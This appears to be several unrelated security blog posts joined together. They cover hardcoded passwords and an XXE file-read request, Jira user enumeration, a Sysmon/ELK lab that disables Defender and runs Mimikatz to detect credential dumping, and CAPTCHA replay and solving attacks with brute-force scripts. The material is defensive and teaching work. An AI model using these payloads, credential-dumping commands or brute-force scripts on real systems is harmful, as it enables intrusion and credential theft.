
Please Stop Giving Me Your Passwords

I found myself in the office on Saturday night, mainly because the frozen pizza selection is more expansive than mine at home, and I wanted to get a head start on my project for this week. It was a normal Static Application Security Test (SAST), which follows a mostly pre-defined process, with embellishments depending on the languages and frameworks at play.

The first step in that process is to search for hardcoded passwords. I dug out the simple and ugly password regex I’ve created for this and did a search for /pa?ssw?o?r?d?|pwd/gi across the entire codebase. This regex covers all of the standard ways I’ve seen “password” used as a variable name in code. Without fail I got back:

[Screenshot: search results matching the password regex]
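
If you want to reproduce that first step, here is a minimal sketch of the search in Python. The pattern is the regex above; the source root and the file handling are hypothetical simplifications.

import re
from pathlib import Path

# The password regex above, applied to every file under a source root.
PASSWORD_RE = re.compile(r"pa?ssw?o?r?d?|pwd", re.IGNORECASE)

def find_candidates(root):
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), start=1):
            if PASSWORD_RE.search(line):
                yield f"{path}:{lineno}: {line.strip()}"

if __name__ == "__main__":
    for hit in find_candidates("./src"):  # "./src" is a stand-in for the codebase
        print(hit)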

After digging through all the results and parsing out the false positives I ended up with a total of 30 hardcoded passwords. All of them were database connection strings spread across 20 total users, including multiple users with admin access to the database. Our recommendation for this is simple:

Passwords should never be hardcoded in the source code.

Why?

The reasoning behind this is that there are multiple attack paths that result in source code or arbitrary file disclosure. Error messages, public GitHub repos, arbitrary file reads, “oopsies” email attachments, and shoulder surfing are just a few.

A typical escalation path that exploits hardcoded passwords could start with an XML External Entity (XXE) injection. An application that is vulnerable to XXE will allow us to read (almost) any file on the server. Through this, an attacker can fingerprint the technology in play and target the important source code files. For example, a web application using the Python Django framework will contain a settings.py file. This file will sometimes contain hardcoded passwords for the DB connection. With some luck/brute force, an attacker can find the source code directory and read the settings.py file via XXE.

HTTP Request:

POST /xxe HTTP/1.1
Host: netspi.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY settings SYSTEM "file:///django-app/settings.py" >]>
<foo>&settings;</foo>

HTTP Response:

HTTP/1.1 200 OK
Content-Length: 178
Connection: close

DATABASES = {
 'default': {
 'ENGINE': 'django.db.backends.mysql',
 'NAME': 'admin',
 'USER': 'admin',
 'PASSWORD': 'password',
 'HOST': 'prod-db.netspi.com',
 'PORT': '3306',
 }
}

An attacker can now take this information and connect directly to the database, which is public-facing because someone assumed authentication was enough. Once an attacker has this amount of access, any number of paths can be followed to further infiltrate the network. This attack extends to anything that requires a password: admin pages, config pages, mail servers, etc…
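
To make that concrete, here is a minimal sketch of such a connection using the leaked settings above, assuming a MySQL database and the pymysql library; it is an illustration, not assessment tooling.

import pymysql

# Connection details taken directly from the disclosed settings.py.
conn = pymysql.connect(
    host="prod-db.netspi.com",
    port=3306,
    user="admin",
    password="password",
    database="admin",
)
with conn.cursor() as cur:
    cur.execute("SELECT CURRENT_USER()")  # confirm who we are connected as
    print(cur.fetchone())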

Remediation

We need various forms of secrets (passwords, API keys, etc.) on the box somehow, and the goal is to find the method that minimizes the organization's risk. Our suggested remediation is typically to assign them through environment variables on the server. Environment variables are the recommended method due to the low likelihood of an attacker gaining access to them. I've only seen them exploited in two common scenarios: overly verbose debug pages left running in prod, or using OS command execution to list all of the environment variables*. Both are easily combated in large code repositories. Environment variables also allow a more scalable solution, as rotating secrets will only require one configuration change.
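
For the Django example above, the fix could look like the following minimal sketch of settings.py. The variable names are hypothetical and would be set at the deployment level, never in the repository.

import os

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': os.environ['DB_NAME'],            # fail fast if unset
        'USER': os.environ['DB_USER'],
        'PASSWORD': os.environ['DB_PASSWORD'],
        'HOST': os.environ.get('DB_HOST', 'localhost'),
        'PORT': os.environ.get('DB_PORT', '3306'),
    }
}

The same XXE attack would now disclose only the variable names, and rotating the password becomes a server-side configuration change rather than a code deploy.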

Resources

Like most things in security, except 0-days, all the information is out there. A lot of people just aren't aware of the vulnerability or the proper way to fix it. Because of that I won't rehash how every platform implements environment variables, but I will identify what I think are the best resources for doing so.

The handling of sensitive data for an app should always be done at the deployment/orchestration level. This ensures that secrets are stored and managed away from the web servers and databases. Here are some of the popular deployment and orchestration frameworks, with their related resources:

Kubernetes

Jenkins

TravisCI

Drone

TeamCity

CircleCI

GitlabCI

AWS

  • This uses IAM roles, which are not discussed in this blog, but are a stronger substitute for environment variables in AWS applications.

Docker Swarm

  • This is an interesting method using Docker Secrets. Unfortunately, they are stored in files, but they are the recommended method inside the Docker ecosystem.

In the end, secrets don’t belong in the code. Proper distribution will decrease the reach an attacker has through other methods of attack and protect an organization by allowing them to rotate secrets easily and often.

Coming Up

This blog is an attempt at describing a holistic solution to secret handling that will work in every environment. Using environment variables is still not the most secure method, as plaintext sensitive information is available to every user on the box. To combat this, a platform-specific method is usually required, which both Windows and Linux offer.

We’re curious to hear how other organizations handle secrets in their code and what improvements could be made to further advance the topic. Let us know @NetSPI or by leaving a comment below!

* Edit 10:13 AM: Unfortunately, environment variables on Linux are still vulnerable to arbitrary file disclosure, as seen here: https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/.


Jira Information Gathering

What is Jira?

Jira is a web-based issue tracking and project management application that can be used to manage a wide array of information. Using Jira, organizations can design workflows to do anything from bug tracking to physical asset management. The flexibility of Jira, while great, can also lead to several issues if it’s not configured properly.

Authorization

There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users. This information may aid an attacker in gaining access to the application. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Jira uses role-based authorization where users are assigned to groups, and groups are assigned to one or more of the global permissions below.

  1. Jira System Administrators
  2. Jira Administrators
  3. Browse Users
  4. Create Shared Objects
  5. Manage Group Filter Subscriptions
  6. Bulk Changes

Configuration of global permissions is completely up to the application administrator. If they want to give Bob in accounting Jira System Administrators access, they can certainly do that. There are other, less obvious configuration mistakes whose results may be catastrophic.

Browse Users

Upon discovering an instance of Jira, one of the first things I like to do is check for anonymous access to the user picker functionality located at /secure/popups/UserPickerBrowser.jspa.


The Issue

By default, it’s only accessible to authenticated users. This function is used to search for a user and assign them tasks, and it provides a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users.

The Fix

  1. Log in as a user with administrative privileges
  2. Click on the options menu at the top right of the window
  3. In the drop-down menu, Click System
  4. On the left-hand side under Security click the Global permissions link
  5. In the center screen under Jira Permissions the Browse Users permission should not contain the Anyone user group


Manage Filters

While not as severe, this issue is similar to the browse users issue.


The Issue

This page lists the most popular filters used to categorize issues and tasks within the application. It also lists the username of the person who ‘owns’ each of these filters. This will likely not be a complete list of users like the browse users function, but it can reveal useful information about how usernames are formatted. Additionally, it can give an attacker an idea of what kind of information may be housed within the application.

The Fix

  1. Log in as a user with administrative privileges
  2. Click on the options menu at the top right of the window
  3. In the drop-down menu, click System
  4. On the left-hand side under Security click the Global permissions link
  5. In the center screen under Jira Permissions, the Manage Group Filter Subscriptions permission should not contain the Anyone user group

In the end, the Anyone group should not be set on any of these global permissions. Additionally, visibility can be set on a per-issue basis, and modifying the global setting does not fix issues that were already configured this way.

Potential Impact

I wrote a quick Python script to show how easy it would be for an attacker to parse this information, which can be found here. This information would be extremely useful in a more targeted password guessing or phishing campaign. If you can compromise an administrator account, all other users are effectively compromised. It’s best to assume that, no matter the security controls in place, at some point an attacker is going to find a way in. Therefore, storing sensitive information such as usernames and passwords in Jira is not recommended.
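
For illustration, here is a minimal sketch in the same spirit. The endpoint is the UserPickerBrowser.jspa path discussed above; the base URL is a hypothetical stand-in, and a real page would deserve proper HTML parsing rather than a regex.

import re
import requests

def browse_users(base_url):
    # Request the user picker anonymously (no session cookie).
    url = f"{base_url}/secure/popups/UserPickerBrowser.jspa"
    resp = requests.get(url, timeout=10)
    if resp.status_code != 200 or "login" in resp.url.lower():
        print("User picker does not appear to be anonymously accessible.")
        return []
    # Crudely pull out anything that looks like an email address.
    return sorted(set(re.findall(r"[\w.+-]+@[\w.-]+\.\w+", resp.text)))

if __name__ == "__main__":
    for email in browse_users("https://jira.example.com"):
        print(email)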

References

  1. https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5
  2. https://confluence.atlassian.com/adminjiraserver073/managing-global-permissions-861253290.html

Windows Events, Sysmon and Elk…oh my! (Part 2)

Overview

In the previous post, we walked through how to set up an ELK instance and forward event logs using Winlogbeat. If you haven’t set up an ELK instance, I would first read the previous blog post, Windows Events, Sysmon and Elk…oh my!, and get an instance of ELK running. If you are just setting up ELK, don’t worry about setting up Winlogbeat as referenced in that article; we will be making specific Winlogbeat configuration changes for forwarding events. In this post, we will be working through:

  • Setting up a log collector for Windows Event Forwarding
  • Creating a GPO to support Windows Event Forwarding
  • Creating a GPO to deploy Sysmon
  • Creating event subscriptions
  • Forwarding events using Winlogbeat to ELK
  • Generating events

Disclaimer: Prior to beginning, you should already be familiar with creating and configuring Group Policy Objects. It is also recommended that you work through these instructions in a lab environment.

Environment
Much like my lab environment described in the previous post, I am running Hyper-V with two Windows 10 hosts, two Windows 2012 servers, and an Ubuntu Server 16.04.3. I set up the Windows hosts in a small Windows domain. I have tested the same setup with VMware Workstation and things worked just fine.

1. Log Collector Setup

I have seen several blogs describing how to set up log collectors, but probably the best resource I have seen to date is Jessica Payne’s Microsoft Virtual Academy video entitled Event Forwarding and Log Analysis. I highly recommend watching the video as it provides additional context for event forwarding. I will borrow from Jessica’s instructions and have you run the following commands from an elevated PowerShell prompt on the server you wish to be your log collector.

Set-Service -Name WINRM -StartupType Automatic
WINRM quickconfig -quiet
wecutil qc -quiet

To quickly break down what is going on, these commands set WINRM to run on system startup, configure the machine to accept WS-Management requests, and configure the Windows Event Collector service. Surprisingly enough, that is ALL that is needed to set up a Windows log collector.

Depending on the size of your environment, you will likely need to expand the size of the Forwarded Events log. This can be done by issuing the following command from an elevated command prompt to allow the log to grow to 1 GB.

wevtutil sl forwardedevents /ms:1000000000

In a future blog post we might get into specifics about log event size and setting up custom log event buckets, but that is outside the scope of this post. You can deep dive into this topic here:

2. Winlogbeat Setup


Winlogbeat will be used to forward collected events to the ELK instance. Download a copy of Winlogbeat and place the unzipped folder on the Desktop. Next, edit the winlogbeat.yml within the Winlogbeat folder to capture the Forwarded Events log (which will include the Sysmon events), disable the local Elasticsearch output, and forward the Logstash output to the Ubuntu server. The following snippets show what to edit.

Winlogbeat specific options – Before
winlogbeat.event_logs:
  - name: Application
    ignore_older: 72h
  - name: Security
  - name: System

We will remove all other specified log files and specify the Forwarded Events log.

Winlogbeat specific options – After
winlogbeat.event_logs:
  - name: ForwardedEvents   # <--- Add this
Elasticsearch output – Before
output.elasticsearch:
  # Array of hosts to connect to.
  hosts: ["localhost:9200"]

  # Optional protocol and basic auth credentials.
  #protocol: "https"
  #username: "elastic"
  #password: "changeme"
Elasticsearch output – After
#output.elasticsearch:   # <--- Comment this out
  # Array of hosts to connect to.
  # hosts: ["localhost:9200"]   # <--- Comment this out

  # Optional protocol and basic auth credentials.
  #protocol: "https"
  #username: "elastic"
  #password: "changeme"
Logstash output – Before
#output.logstash:
  # The Logstash hosts
  #hosts: ["localhost:5044"]

  # Optional SSL. By default is off.
  # List of root certificates for HTTPS server verifications
  #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"]

  # Certificate for SSL client authentication
  #ssl.certificate: "/etc/pki/client/cert.pem"

  # Client Certificate Key
  #ssl.key: "/etc/pki/client/cert.key"
Logstash output – After
output.logstash:   # <--- Uncomment this
  # The Logstash hosts
  hosts: ["UbuntuServerIPAddressHere:5044"]   # <--- Uncomment this and add the IP address of your Ubuntu Server

  # Optional SSL. By default is off.
  # List of root certificates for HTTPS server verifications
  ssl.certificate_authorities: ["C:/Users/username/Desktop/winlogbeat/ELK-Stack.crt"]   # <--- Uncomment this and add the path to the ELK cert

  # Certificate for SSL client authentication
  #ssl.certificate: "/etc/pki/client/cert.pem"

  # Client Certificate Key
  #ssl.key: "/etc/pki/client/cert.key"

We now need to get a copy of the SSL certificate created during the ELK installation using PSCP.exe. The following command can be used; replace the usernames and IP address with the correct values for your environment.

PSCP.EXE username@IPAddress:/etc/pki/tls/certs/ELK-Stack.crt C:\Users\Username\Desktop\winlogbeat\ELK-Stack.crt

Now we can install Winlogbeat.

Install Winlogbeat

From an administrator PowerShell prompt, navigate to the Winlogbeat folder on your desktop and issue the following commands:

powershell -Exec bypass -File .\install-service-winlogbeat.ps1
Set-Service -Name "winlogbeat" -StartupType automatic
Start-Service -Name "winlogbeat"

Now that the service is running, all events that reach the Forwarded Events log will be sent to the ELK instance. Next, we need to set up some GPOs and subscriptions to tell hosts in the domain which events we want them to send.

3. Group Policy Objects (GPO)

GPO #1 – Event Log Forwarding

Setting up group policies is critical for our event forwarding to work correctly. The GPO we are about to setup will tell hosts in the domain where to send logs, allow the Network Service to access log data, and configure WINRM to ship off the data and run on startup.

On the domain controller, open an MMC console with the Group Policy Management snap-in console, and create a GPO entitled Event Log Forwarding. I have entitled the GPO Event Log Forwarding because I am extremely creative. Open the GPO for editing and navigate to Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Event Forwarding.

Edit the value for Configure target Subscription Manager by selecting Enabled, then click Show next to SubscriptionManagers.

In the new window that will pop up, enter the FQDN for the collector. We will also specify the time interval we want hosts to check in with the collector for subscription information. The refresh interval is in seconds, so this line will require hosts to check in every two minutes.

Server=http://<FQDN of the collector>:5985/wsman/SubscriptionManager/WEC,Refresh=120

The input should end up looking similar to the screenshot below.

Apply your changes to save the configuration. The next change we will make to this GPO is to give the Network Service user the ability to read event logs. This prevents us from having to use wevtutil to edit permissions on the log file to allow WINRM to read and send log data to the collector. Navigate to Computer Configuration –> Policies –> Windows Settings –> Restricted Groups. Right-click within the window and select Add Group.

A new window will pop open; click on Browse, then Advanced, and finally Find Now. Select the Event Log Readers group and then click the OK buttons until the Event Log Readers Properties window is displayed.

From Event Log Readers Properties click on Add, and within the text box provided type or paste in the following:

NT AUTHORITY\NETWORK SERVICE

Your result should appear like the screenshot below.

The last thing we will need to do for this GPO is to set WINRM to start automatically. Navigate to Computer Configuration –> Policies –> Windows Settings –> System Services. Find the Windows Remote Management service, and edit it so the policy is defined and the radio button is set to Automatic.

Now we can begin linking the GPO to the appropriate groups. In my Windows domain I have three OUs: Domain Controllers, Domain Servers, and Domain Workstations, with the appropriate hosts assigned to each. You can now link the GPO we have created to the OUs you wish to collect events from.

Since I am in a lab environment, I can easily connect to hosts within my OUs and run the command gpupdate /force to quickly apply the GPO.

GPO #2 – Sysmon

If you do not have any endpoint management software, deploying software can become fairly tricky. For deploying Sysmon I have opted to push it out via GPO. The goal is to create a startup script that pulls the Sysmon binary and the Sysmon config from the SYSVOL folder, copies both locally, and initiates the installation.

To prep for the GPO, we need to place Sysmon, the Sysmon config, and the startup script within the SYSVOL folder on the domain controller. Yes, you could create a separate folder on a file share, but you would need to ensure that the correct permissions are set on that folder so that no regular user can write to that location. Since the startup script launches as SYSTEM, this would provide a great way for someone to gain elevated privileges on a host if they are able to replace or backdoor the Sysmon.exe binary. You have been warned.

Within the SYSVOL folder on your domain controller, create a new folder entitled Sysmon. Next, download a copy of Sysmon from Microsoft and place both Sysmon.exe and Sysmon64.exe in the newly created Sysmon folder. Grab a sample Sysmon config from Swift on Security’s GitHub page (@SwiftOnSecurity). Rename the file to Sysmonconfig.xml and make the following edits to enable us to monitor for LSASS events.

Before
<!--Sysmon EVENT ID 10 : INTER-PROCESS ACCESS [ProcessAccess]-->
   <!--EVENT 10: "Process accessed"-->
   <!--COMMENT: Can cause high system load, disabled by default.-->
   <!--COMMENT: Monitor for processes accessing other process' memory.-->
   <!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
   <ProcessAccess onmatch="include">
   </ProcessAccess>
After
<!--Sysmon EVENT ID 10 : INTER-PROCESS ACCESS [ProcessAccess]-->
   <!--EVENT 10: "Process accessed"-->
   <!--COMMENT: Can cause high system load, disabled by default.-->
   <!--COMMENT: Monitor for processes accessing other process' memory.-->

   <!--DATA: UtcTime, SourceProcessGuid, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace-->
   <ProcessAccess onmatch="include">
      <TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
   </ProcessAccess>
   <!-- Processes that you wish to exclude -->
   <ProcessAccess onmatch="exclude">
      <SourceImage condition="is">C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe</SourceImage>
   </ProcessAccess>

Download a copy of SysmonStartup.bat and change the DC and FQDN values to match your domain information. Be careful of spaces when entering the information. After you are done editing the script, place it in the newly created Sysmon folder.

SysmonStartup.bat- Before
:: Enter the full name of the domain controller, and FQDN for the domain. 
:: Be EXTREMELY careful of spaces!!
:: Example: DC=dc.corp.local
:: Example: FQDN=corp.local

SET DC=
SET FQDN=
SysmonStartup.bat- After
:: Enter the full name of the domain controller, and FQDN for the domain. 
:: Be EXTREMELY careful of spaces!!
:: Example: DC=dc.corp.local
:: Example: FQDN=corp.local

SET DC=dc.corp.local
SET FQDN=corp.local

Now that we have all the files within the Sysmon folder in SYSVOL, we can create the GPO to perform the deployment. Take the following steps to create the GPO:

  • Create a new GPO and title it SYSMON Deploy
  • Navigate to Computer Configuration –> Policies –> Windows Settings –> Scripts (Startup/Shutdown)
  • Right-click on top of Startup and select Properties.
  • In the Startup Properties window, click on Add, then on Browse, and navigate to the SysmonStartup.bat
  • Click the OK buttons to save and close.
  • Lastly, link the GPO to all the OUs you wish to deploy Sysmon to.

Just like before, I will log in to a host with the applied GPO and run gpupdate /force to apply the newly created Sysmon GPO. We will then need to reboot the host to get Sysmon to install. If you are impatient like me, you can run the batch file from the SYSVOL folder on the DC from an administrative command prompt to install Sysmon. You can also take this approach for installing Sysmon onto hosts that rarely reboot.

Note: You will need to either reboot a host with the applied GPO or install Sysmon manually to work through the Event Subscriptions section below.

4. Event Subscriptions

Event subscriptions are how the log collector advertises to hosts which events they should be sending. A few different approaches can be taken for telling hosts within the domain which events to send. We can do a catch-all and have hosts send everything, or we can get pretty specific and tell hosts to send only events that match specified criteria. To specify the criteria we will use XPath queries. XPath queries are a topic of their own and outside the scope of this article. You can use the references below to deep dive into the topic; this article will show you how to find events related to Mimikatz and PowerShell network connections.

To create a subscription, open an elevated MMC console on the Windows server you have configured to be your log collector and add the Event Viewer snap-in. When prompted whether you want to connect to another computer, leave the radio button set to Local computer and proceed through the rest of the prompts.

In the far right pane within the MMC window, click on Create Subscription. In the Subscription Name field, enter Mimikatz LSASS Events (0x1010 AND 0x1038). Set the destination log to be Forwarded Events. Next, select the radio button for Source computer initiated, then click the Select Computer Groups button.

Click on Add Domain Computers and add the group of computers you want to collect Mimikatz events from.

Unfortunately, we are only able to add computers using group membership and not OUs (Q: Why is this the case? A: No freaking clue). By default in Windows domains, all workstations and servers are part of the Domain Computers group. At this point, you can create some group memberships and add computers, or you can just choose to add Domain Computers.

After adding the group, click the OK button to close down the Computer Groups window.

In the Subscription Properties window click on Select Events then click on the XML tab.

Near the bottom of the XML tab window, select the checkbox for Edit query manually. A prompt window will open to confirm that you want to manually enter an XPath query. Click Yes to proceed.

Copy and paste the following XPath query into the text area provided for the query.

Mimikatz XPath Query
<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
    *[System[(EventID=10)]]
    and
    *[EventData[Data[@Name='GrantedAccess'] and (Data='0x1010' or Data='0x1038')]]
    </Select>
  </Query>
</QueryList>

To describe what is going on with this query: we are looking within the Sysmon event log for Event ID 10 events dealing specifically with lsass.exe. We then look for event data with a specific value in the GrantedAccess field. When Mimikatz dumps credentials from LSASS, it gives itself access to LSASS with the PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010) rights. Combining both values with a bitwise OR operation, we end up with a value of 0x1010. If you are curious how I came to this, read the previous blog post on this topic. So, as we can see in the XPath query, we will be searching for when GrantedAccess has a value of 0x1010. For Pass-the-Hash events, we can search for a value of 0x1038: when Mimikatz performs its PTH operation, it gives itself PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_READ (0x0010), PROCESS_VM_WRITE (0x0020), and PROCESS_VM_OPERATION (0x0008), resulting in a combined value of 0x1038.
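
As a quick sanity check on that arithmetic, the access masks can be combined in a couple of lines of Python:

# GrantedAccess arithmetic from the paragraph above.
PROCESS_VM_OPERATION              = 0x0008
PROCESS_VM_READ                   = 0x0010
PROCESS_VM_WRITE                  = 0x0020
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# sekurlsa::logonpasswords reads LSASS memory:
assert PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ == 0x1010

# sekurlsa::pth reads and writes LSASS memory:
assert (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ
        | PROCESS_VM_WRITE | PROCESS_VM_OPERATION) == 0x1038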

Click OK to save the query, and click OK to close the Subscription Properties window.

How do we know if this subscription is working? If you right-click within the Subscriptions window and select Refresh, the Source Computers field will go from 0 to however many computers the Windows Event Forwarding GPO has been applied to. In my case, I have three hosts currently checking in. It may take a minute or two for hosts to check in and pick up the subscription.
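
If you prefer the command line, wecutil on the collector should also report per-source runtime status for a subscription, using the subscription name we entered above as the subscription ID:

wecutil gr "Mimikatz LSASS Events (0x1010 AND 0x1038)"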

5. Generating Events


From a host where Sysmon is installed, we will execute Mimikatz to generate events and make sure they are being collected. However, we will first need to disable Windows Defender in order to run Mimikatz.

Disable Windows Defender

Open the MMC console with Administrator access and add the Local Group Policy Object snap-in console. Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender Antivirus. Change the policy for “Turn off Windows Defender Antivirus” to “Enabled” and apply the changes. After you have it disabled, check the running services and ensure that none of the Windows Defender services are running.

Mimikatz

Download a copy of Mimikatz (see the references below) and execute it from an elevated command prompt. Once Mimikatz is running, issue the following commands:

privilege::debug
token::elevate
sekurlsa::logonpasswords

Next, go to the log collector, check the Forwarded Events log within Event Viewer, and find the Mimikatz event with a GrantedAccess value of 0x1010.

Now that we have generated an event, we can open Kibana and search for it.

6. Defining Search Indexes – ELK

Now that events are going to the Forwarded Events log, and if Winlogbeat was set up correctly, events should be arriving at our ELK instance. However, to search these events we need to specify the indexes we want to query. Navigate to the IP address of your ELK instance and log in with the credentials used during the setup process. Once logged in, click on Management in the left menu, and then select Index Patterns.

In the Index pattern text box, type in winlogbeat*. As you begin to type, Kibana will begin a search of all available indexes and will present a successful message if it sees the Winlogbeat indexes. If successful, click the Next step button.

In the drop down box under Time Filter field name select @timestamp and click the Create index pattern button.

The next page that will display will be the index pattern page showing all the fields that Kibana has currently indexed. To see the Windows events, click on Discover in the left menu.

In the search bar within the Kibana dashboard, enter the following search string:

event_id:10 AND event_data.GrantedAccess: 0x1010

Though we only have the one index, and very few events, you will see that the ELK instance has correctly indexed the log files and made the fields that we care about easily searchable! If you are not seeing any events, you might need to change the time frame for searching events by clicking on the date/time in the top right.

In the next blog post, we will get into dashboard creation within Kibana and how to make effective visualizations for greater situational awareness. We will also cover how to create additional event subscriptions for gathering more events.

References

Jessica Payne @jepayneMSFT
Event Forwarding and Log Analysis
https://mva.microsoft.com/en-US/training-courses/event-forwarding-and-log-analysis-16506

Swift on Security @SwiftOnSecurity
https://github.com/SwiftOnSecurity/Sysmon-config.git

Benjamin DELPY @gentilkiwi
https://github.com/gentilkiwi/mimikatz

Web app assessments are probably one of the most popular penetration tests performed today. They are so popular that public bug bounty sites such as HackerOne and Bugcrowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL injection, and CSRF. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow us in our 4-part mini-series of blog posts about web security:


CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) are an anti-automation control that is becoming more and more important in protecting forms from automated submissions. However, just because you have a CAPTCHA on your form does not mean that you “did it right”. Let’s review some of the important parts of implementing a CAPTCHA:

Check #1: Can it be re-used?

Here’s an example we recently ran into:

Everything looks good, right? The application would not allow a user to log in without solving the CAPTCHA, and the CAPTCHA was difficult for a computer to guess but relatively easy for a human to solve. Here’s a sample login POST body as captured in Burp’s Proxy:

You can see that the user’s username and password are being sent along with the CAPTCHA’s “hash” and the CAPTCHA’s solution. If the CAPTCHA’s “hash” is stored in the back-end database as a one-time-use entry that gets deleted when the user submits this login request, everything should be fine. To test this, all we need to do is repeat the request back to the server. If the server accepts the replayed CAPTCHA submission, then we know we can reuse this CAPTCHA submission to brute-force guess a user’s login credentials.

(Burp Intruder was used to replay the login POST request while changing the submitted password.  The user’s password was successfully guessed on the 86th try even though we were replaying the same CAPTCHA on each request.)
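
To make the replay test concrete, here is a minimal sketch of it in Python. The endpoint, field names, wordlist, and failure marker are hypothetical stand-ins for whatever appears in the captured request.

import requests

LOGIN_URL = "https://target.example.com/login"
CAPTCHA_HASH = "captured-captcha-hash"     # lifted once from the proxied request
CAPTCHA_SOLUTION = "captured-solution"     # solved once by a human

def try_password(password):
    resp = requests.post(LOGIN_URL, data={
        "username": "victim@example.com",
        "password": password,
        "captchaHash": CAPTCHA_HASH,       # replayed verbatim on every attempt
        "captchaSolution": CAPTCHA_SOLUTION,
    })
    return "invalid login" not in resp.text.lower()

for candidate in ["Password1", "Spring2018!", "Welcome1"]:
    if try_password(candidate):
        print("Valid credentials found:", candidate)
        break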

In the end, this particular login portal wasn’t protecting its users from anything other than a simpler login process. Each user was inconvenienced by the need to solve the CAPTCHA, but an attacker could bypass the CAPTCHA by solving it once and then replaying it multiple times. Along with having a one-time-use database entry for the CAPTCHA, the application could tie the CAPTCHA’s id to the user’s current session cookie value and ensure that each request requiring a CAPTCHA performs a lookup on the user’s session to determine which CAPTCHA the user is supposed to solve. If the request is submitted without a session cookie, or the same CAPTCHA id is replayed, the request should automatically fail.
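
Here is a minimal sketch of those server-side checks, assuming a Flask application with an in-memory CAPTCHA store; all names are hypothetical, and a real deployment would render an actual challenge image and use a shared store such as Redis.

import secrets
from flask import Flask, abort, jsonify, request, session

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)

# captcha_id -> expected solution; each entry is deleted on first lookup.
pending_captchas = {}

@app.get("/captcha")
def issue_captcha():
    captcha_id = secrets.token_urlsafe(16)
    pending_captchas[captcha_id] = secrets.token_hex(3)  # stand-in for a rendered challenge
    session["captcha_id"] = captcha_id   # tie the CAPTCHA to this session
    return jsonify(id=captcha_id)

@app.post("/login")
def login():
    captcha_id = session.pop("captcha_id", None)  # only the issuing session may answer
    if captcha_id is None:
        abort(400)  # no CAPTCHA was issued for this session
    expected = pending_captchas.pop(captcha_id, None)  # one-time use: deleted here
    if expected is None or request.form.get("captcha") != expected:
        abort(403)  # replayed id or wrong solution
    # ...normal username/password validation continues here...
    return "ok"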

Check #2: Do I need to solve it?

Here’s another example of a failed CAPTCHA implementation on an account registration page:

What can we notice from this example? The new account registration page has implemented a CAPTCHA, but the form performs a check on the new account’s email address as soon as the attacker enters it into the form…no CAPTCHA solving required. An attacker can use this unprotected functionality to brute-force the discovery of email addresses that have already been registered on the site. This particular application was using the email address as the username in its login requests (and was also using a weak password policy), so we were able to log in to over a dozen separate accounts by trying a common password against our discovered email addresses.

Check #3: Is it difficult for a computer to solve?

Here are some sample CAPTCHAs taken from a recent assessment:

What sticks out about these CAPTCHAs? They seem to be using some sort of pre-defined template for letter placement (letters always in the same spot), always contain 8 characters, and only use letters of the English alphabet (26 possibilities). OCR programs do not do very well on the character analysis for these CAPTCHAs, but with a few simple transformations, here are some results we were able to obtain:

OCR still didn’t perform very well on these transformed CAPTCHAs (less than a 2% match rate using Google’s Tesseract library), but there is another possibility open to a determined attacker: solve the letters in each position and store them in a database to use in solving future CAPTCHAs. A simple program can show the attacker the letter in a particular position and then store the individual letter/position combinations in a database to be matched against all subsequent CAPTCHAs. This would require an attacker to manually input 26 x 8 = 208 individual letter/position combinations, but then the computer could use the attacker’s stored information to solve the majority of the CAPTCHAs possible on this particular application.
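
Here is a minimal sketch of that idea, assuming the fixed letter slots described above; the slot width, file names, and storage layout are hypothetical.

import hashlib
import sqlite3
from PIL import Image

SLOTS = 8
SLOT_WIDTH = 25   # pixels per character slot (assumed from the template)

db = sqlite3.connect("captcha_letters.db")
db.execute("CREATE TABLE IF NOT EXISTS seen (pos INT, hash TEXT, letter TEXT)")

def slot_hashes(image_path):
    # Hash the pixels of each fixed character slot.
    im = Image.open(image_path).convert("L")
    for pos in range(SLOTS):
        crop = im.crop((pos * SLOT_WIDTH, 0, (pos + 1) * SLOT_WIDTH, im.height))
        yield pos, hashlib.sha256(crop.tobytes()).hexdigest()

def learn(image_path, solution):
    # Store the manually supplied letters for each slot of a solved CAPTCHA.
    for pos, h in slot_hashes(image_path):
        db.execute("INSERT INTO seen VALUES (?, ?, ?)", (pos, h, solution[pos]))
    db.commit()

def solve(image_path):
    # Look up each slot; "?" marks letter/position combinations not yet seen.
    letters = []
    for pos, h in slot_hashes(image_path):
        row = db.execute(
            "SELECT letter FROM seen WHERE pos=? AND hash=?", (pos, h)
        ).fetchone()
        letters.append(row[0] if row else "?")
    return "".join(letters)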

Solving 208 separate character positions didn’t take more than a few minutes (although writing the code to do it took a few hours), so the payoff to an attacker would only be worth it if the CAPTCHA’d request were of high value.

Overall, the script was able to solve these CAPTCHAs with 70% accuracy. Here are some example results:

